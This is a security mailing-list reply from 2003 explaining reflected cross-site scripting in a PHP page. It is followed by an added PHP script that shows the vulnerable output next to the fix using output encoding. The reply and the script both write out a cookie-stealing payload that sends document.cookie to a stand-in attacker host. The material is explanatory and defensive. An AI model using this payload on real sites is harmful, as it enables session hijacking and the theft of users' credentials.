Security Basics mailing list archives

Re: About malicious java script running...


From: Shaun Colley <shaunige () yahoo co uk>
Date: Tue, 9 Dec 2003 19:09:04 +0000 (GMT)

Hey.

Having the ability to inject malicious HTML code (or,
as some call them, "cross-site scripting attacks") is
not directly an issue for the security of the server
side, but can consequently lead on to the compromise
of the server's security.  Here's an example:

The attacker crafts a URL string containing malicious
JavaScript to give to the variable $a, to redirect the
socially engineered user who unsuspectingly visits the
URL to the attacker's site to steal the user's cookie.

http://host/a.php?variable=";><script>document.location='http://www.attackersite.com/cookiesteal.cgi?'%20+document.cookie</script>

The user's cookie is stolen, leaving the attacker with
login credentials.

Now, this is not directly a threat to the server,
rather a potential threat to users of the site.  But
what if, for example, the attacker persuaded the
administrator to click that URL?  The administrator's
session cookie would be stolen, thus resulting in a
system compromise.

Without the server-side example, the attacker still
has the ability to inject malicious code; this still
leaves the door open to a multitude of possibilities...

> I think... this is a very~~~ common hole in many
> sites.

Yeap, way too many scripts do not sanitize user input.
Main rule in CGI and web development: do not trust
user input.



Thank you for your time.
Shaun.


--- s970501 () ku edu np wrote:
> Hi,
>
> I have a question about JavaScript exploits.
> Suppose... somebody can put JavaScript and can run
> it, what can he do?
>
> I have a website running Apache/PHP.
> Some of the pages are workin' like this...
>
> test.php?a=333
> ...
> <?php
>   ...
>   // $a is filled from the ?a= query string (register_globals)
>   echo "$a";
>   ...
> ?>
> ...
>
> I found anybody can run JavaScript from this
> source...
> like test.php?a=<script>alert("hey")</script> or
> something else.
>
> But what can he do with this hole...?
> Is there anything he can do on the server side?
> Is there any JavaScript that can make files or see
> files on the server?
>
> I think... this is a very~~~ common hole in many
> sites.
>
> Thanks...
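The test.php from the question, reduced to a runnable script that shows the vulnerable reflection next to the fix. This is an added example, not code from either poster: it reads the parameter from $_GET explicitly instead of relying on register_globals, the attribute context and the names render_unsafe/render_safe are my own, and the inputs are the benign value plus the two payloads quoted in the thread.

```php
<?php
// Added example, not code from the thread. The original test.php echoed
// $a straight into the page; here the parameter is taken from an explicit
// input list so the source of the data is clear. The attribute context is
// an assumption: the ";> prefix of the cookie-stealing payload in the reply
// only makes sense if $a landed inside a double-quoted attribute.

// Vulnerable: raw query value interpolated into an HTML attribute.
function render_unsafe($a)
{
    return '<input name="a" value="' . $a . '">';
}

// Hardened: HTML-encode on output. ENT_QUOTES also encodes ' and ",
// so the value cannot close the attribute it sits in and cannot start a
// <script> element either, since < and > become &lt; and &gt;.
function render_safe($a)
{
    return '<input name="a" value="'
        . htmlspecialchars($a, ENT_QUOTES, 'UTF-8')
        . '">';
}

// Constructed inputs: the benign value and the two payloads from the thread.
$inputs = array(
    '333',
    '<script>alert("hey")</script>',
    '";><script>document.location=\'http://www.attackersite.com/cookiesteal.cgi?\'+document.cookie</script>',
);

foreach ($inputs as $a) {
    echo "input:  $a\n";
    echo "unsafe: " . render_unsafe($a) . "\n";
    echo "safe:   " . render_safe($a) . "\n\n";
}
```

Run it with `php test.php`. For the second and third inputs the unsafe line reproduces the `<script>` element verbatim, which a browser would execute; the safe line shows `&lt;script&gt;...` and `&quot;&gt;`, which it renders as text. Encoding at the point of output is the fix for the reflection itself. On the cookie-theft side, marking the session cookie HttpOnly (the seventh argument of setcookie(), added in PHP 5.2.0, after this thread) stops document.cookie from reading it, but it does nothing about everything else injected script can do while riding the victim's session.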
